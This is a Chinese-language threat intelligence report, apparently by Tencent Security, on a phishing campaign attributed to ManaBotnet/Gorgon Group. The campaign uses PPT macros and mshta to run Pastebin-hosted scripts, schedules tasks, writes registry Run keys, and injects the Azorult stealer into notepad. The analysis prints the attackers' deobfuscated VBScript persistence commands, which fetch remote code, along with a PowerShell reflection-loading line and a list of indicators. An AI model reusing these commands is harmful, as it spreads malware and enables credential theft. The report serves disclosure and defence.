一、背景

近期腾讯安全威胁情报中心检测到多个企业受到以PPT文档为诱饵文档的钓鱼邮件攻击。这些钓鱼邮件投递的PPT文档包均含恶意宏代码，宏代码会启动mshta执行保存在pastebin上的远程脚本代码，且pastebin URL是由Bitly生成的短链接。 

此次攻击的主要特点为恶意代码保存在托管平台pastebin上：包括VBS脚本、Base64编码的Powershell脚本以及经过混淆的二进制数据。攻击者在后续阶段会通过计划任务下载RAT木马，然后将其注入指定进程执行，RAT会不定期更换，当前获取的RAT 木马是Azorult窃密木马。 

对比分析发现，攻击者注册的pastebin账号为”lunlayloo”（ 创建于2019年10月），与另一个账号“hagga”（创建于2018年12月）对应攻击事件中使用的TTP高度相似，因此我们认为两者属于同一家族ManaBotnet，并且”lunlayloo”可能为“hagga”的后继者。 

有安全厂商分析认为Pastebin账号“hagga”发起的攻击活动有可能来自组织Gorgon Group，一个疑似来自巴基斯坦或与巴基斯坦有关联的黑客组织。该组织已进行了一系列非法行动和针对性攻击，包括针对英国、西班牙、俄罗斯和美国的政府组织的攻击。

Manabotnet攻击流程

二、详细分析

初始攻击以PPT文档为诱饵，使用的文件名有“SHN FOODS ORDER.ppt”、“PrivateConfidential.ppt”、“Analysis Reports.ppt”、“Order001.ppt”、“payment_receipt.ppt”，邮件主题为Analysis ReportsFrom IDS Group（来自IDS Group的分析报告 ）、Analysis Reports From NHL - Nam Hoang Long Co.,Ltd（来自NHL公司的分析报告）、Purchase Order2020（2020采购订单）、payment_receipt.ppt（付款收据）等。

Analysis Reports.ppt中包含恶意的VBA宏代码。

如果用户选择启用宏，则会执行命令：mshtahttps[:]//j.mp/ghostis61hazsba，远程代码URL是短链接，还原为https[:]//pastebin.com/raw/FssQ8e8e，恶意代码被保存在托管平台pastebin.com。 

以同样方式投递的文档SHN FOODS ORDER.ppt中的宏执行的恶意代码为，https[:]//j.mp/ghjbnzmxc767zxg，短链接还原得到https[:]//pastebin.com/raw/RCd2CLNd，该地址的托管恶意代码页面如下：

通过浏览器的调试功能对该代码进行编码转换可得到VBScript代码：

该代码加入了一些字符反转和字符连接操作，以逃避恶意代码检测，然后执行5个操作进行持久化： 

1.    创建计划任务“Murtaba”，每80分钟运行一次远程hta脚本

2.    执行一次hta脚本

3.    在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2下写入执行hta脚本的命令

4.    在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3下写入执行hta脚本的命令

5.    在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\中写入执行hta脚本的命令

CreateObject("WScript.Shell").Run StrReverse("/ 08 om/ ETUNIM cs/ etaerc/ sksathcs") + "tn ""Murtaba"" /tr ""\""'mshta\""http:\\pastebin.com\raw\B7f3BpDk"" /F ",0

CreateObject("WScript.Shell").Run """mshta""""http:\\pastebin.com\raw\B7f3BpDk"""

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2", """m" + "s" + "h" + "t" + "a""""http:\\pastebin.com\raw\eMse7spS""", "REG_SZ"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3", """m" + "s" + "h" + "t" + "a""""http:\\pastebin.com\raw\hxKddkar""", "REG_SZ"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\", """m" + "s" + "h" + "t" + "a""""http:\\pastebin.com\raw\v2US1QAY""", "REG_SZ"

在计划任务中指定执行的远程hta脚本均https[:]\\pastebin.com\raw\B7f3BpDk，解码为以下文本，同样是一段VBScript代码，在其中以隐藏的方式执行Powershell，首先通过ping google.com测试网络是否连通，然后下载Powershell脚本https[:]//pastebin.com/raw/8ZebE1MG进行base64解码并执行。 

计划任务执行的Pastebin保存的VBScript脚本：

VBScript通过Powershell执行Pastebin保存的以base64编码的Powershell脚本：

Base64解码后：

Powershell代码将一个压缩包文件的二进制数据以硬编码形式进行保存，使用时首先将“!”替换为“0x”去除混淆，然后通过IO.MemoryStream将数据读取到内存，最后再使用IO.Compression.GzipStream进行解压，就可以获得一个以.Net编写的DLL并通过Reflection  加载执行： 

$t=[System.Reflection.Assembly]::Load($decompressedByteArray);

Powershell获取的另一个PE直接保存了二进制编码在pastebin的URL（https://pastebin.com/raw/f9c50ewQ）上，使用时首先将‘T_B’替换为‘0x’，在分析过程中发URL被动态更换为了：https://pastebin.com/raw/EmyvkN6m，使用时将“^^_^^”替换为“0x”，还原得到PE文件后，将其注入到notepad.exe的内存中执行：

[Givara]::FreeDom(‘notepad.exe’,$Cli2) 

https[:]//pastebin.com/raw/f9c50ewQ

https[:]//pastebin.com/raw/EmyvkN6m

.NET编写的DLL名为Apple.dll，入口调用Fuck.FUN，Fuck.FUN随后启动记事本，掏空现有部分的映射，在记事本进程中分配一个新的缓冲区，向该进程中写入有效负载，然后继续执行线程。这样使得攻击者无需将恶意软件写入磁盘，通过计划任务可定期获取注射器（一段攻击代码，用来将RAT注入其他程序）和RAT，并将RAT注入指定进程的内存中执行。

当前作为Payload被下载执行的是Azorult木马，一种使用Delphi编写的窃密木马变种。Azorult已在俄罗斯论坛上出售，价格最高为100美元。 

Azorult窃密木马的大多数功能是获取可以在受害者计算机上找到的各类账号密码，例如，电子邮件帐户，通信软件（例如pidgin、 psi+,、telegram），Web Cookie，浏览器历史记录和加密货币钱包，同时该木马还具有上载和下载文件以及截屏的功能。

三、团伙分析

攻击者使用第三方网站（例如Bitly，Blogspot和Pastebin）可能是为了逃避检测，因为这些网站不会被网络防御方判断为恶意网站。但是，诸如Bitly和Pastebin之类的网站会记录访问某个链接的次数。我们能够确定是谁创建了此Pastebin帖子，并统计该链接被访问了多少次。 

例如，从页面可以看到托管“Apple.dll”样本的URL已被查看12000多次。这表明有12000台计算机受此攻击影响。但是，由于攻击者使用的是已知的RAT木马，因此实际受影响的计算机数量可能会少得多，因为许多计算机可能已安装了杀毒软件。 

“lunlayloo”在2020年3月30日上传的恶意代码，该账户创建于2019年10月23日。

lunlayloo在2020年4月21日上传的恶意代码，托管“AzorultRat”，由于最近才更新，被查看只有77次。

分析时发现攻击Azorult Rat回传数据对应的URL为：

http[:]//23.247.102.120/manabotnet-work/index.php

该URL中包含的“manabotnet”与另一安全公司发现的Pastebin帖子标题：“ MasterManabots-all-bots”相同，该攻击者的Pastebin账号名称为“hagga”，于2018年12月3日创建，另外由于两次攻击使用的TTP高度相似性，所以我们认为他们属于同一家族ManaBots。

unit42在2019年4月对Pastebin账号“HAGGA”发起的攻击活动进行了详细的分析，基于高水平的TTP，包括使用RevengeRAT，unit42认为其与Gorgon Group组织有关。

（https[:]//unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/） 

2019年1月腾讯安全御见威胁情报中心也捕获到疑似来自Gorgon Group组织相关的攻击，）（https[:]//www.freebuf.com/column/193603.html），该攻击以“订单”、“支付详单”等主题的钓鱼邮件针对全球的外贸人士进行攻击，行为类似于腾讯安全威胁情报中心多次披露的”商贸信”，攻击者使用blogspot的订阅功能来保存恶意代码。

综合分析以上几次攻击行动，总结该团伙攻击对应的ATT&CK矩阵对应如下，共涉及约44个TTP技术：

其中具有该团伙的代表性的TTP技术点为：

T1170 Mshta

T1086 PowerShell

T1053 ScheduledTask

T1060 RegistryRun Keys / Startup Folder

T1093 ProcessHollowing

T1055 Process Injection

T1102 Web Service

在T1102 Web Service技术上，该团伙经常使用的合法外部Web服务为Bitly、Blogspot和Pastebin，这个技术在ATT&CK矩阵中战术条目中同时属于Defense Evasion（防御逃逸）和Command and Control（命令和控制），在具体攻击过程中体现在可以绕过恶意网址检测，以及可以通过修改托管网站上的URL对应的内容动态控制下载的恶意代码。

四、安全建议

Gorgon Group为专业黑客组织，擅长攻击大型企业、行业及政府背景的机构，腾讯安全威胁情报中心推荐相关单位采用腾讯安全完整解决方案提升系统安全性，防止专业黑客的攻击。

腾讯安全解决方案部署示意图（图片可放大）

 腾讯安全产品针对Gorgon Group黑产团伙的解决方案清单

更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/ 

IOCs

Md5

417eef85b7545b13cb2a5b09508a9b8a

cd425ac433c6fa5b79eecbdd385740ab

f4479c5553271402ab4ff9a55584a9fd

URL

http[:]//23.247.102.120/manabotnet-work/index.php

短链接：

https[:]//j.mp/ghjbnzmxc767zxg

https[:]//j.mp/hdjas6782vnavx

https[:]//j.mp/dhajsk67a8sdg

https[:]//j.mp/ahjkads78dasa

https[:]//j.mp/hdajks6786sa

https[:]//j.mp/dbashgdyt23vb

Pastebin

https[:]//pastebin.com/raw/8ZebE1MG

https[:]//pastebin.com/raw/FssQ8e8e

https[:]//pastebin.com/raw/RCd2CLNd

https[:]//pastebin.com/raw/f9c50ewQ

https[:]//pastebin.com/raw/EmyvkN6m

https[:]//pastebin.com/raw/B7f3BpDk

https[:]//pastebin.com/raw/eMse7spS

https[:]//pastebin.com/raw/hxKddkar

https[:]//pastebin.com/raw/v2US1QAY

参考链接：

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://www.freebuf.com/column/193603.html